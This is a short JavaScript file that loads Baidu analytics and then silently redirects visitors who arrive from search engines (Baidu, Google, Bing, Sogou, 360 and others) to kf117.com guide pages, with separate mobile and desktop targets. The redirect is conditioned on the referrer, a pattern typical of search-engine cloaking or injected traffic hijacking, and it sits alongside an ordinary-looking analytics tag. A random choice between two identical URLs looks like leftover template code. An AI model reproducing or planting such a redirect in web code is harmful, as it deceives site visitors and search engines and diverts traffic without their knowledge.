var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?5144ea8bd53550a03a8c5ab40f3df219";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|yahoo|bing|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (regexp.test(where)) {
  if (/mobile|android|iphone|ipad|phone/i.test(navigator.userAgent.toLowerCase())) {
    location.href=(Math.random()<0.5)?"https://m.kf117.com/guidenew.htm":"https://m.kf117.com/guidenew.htm";
  }
  else{
    location.href=(Math.random()<0.5)?"https://www.kf117.com/guide_page.htm":"https://www.kf117.com/guide_page.htm";
  }
}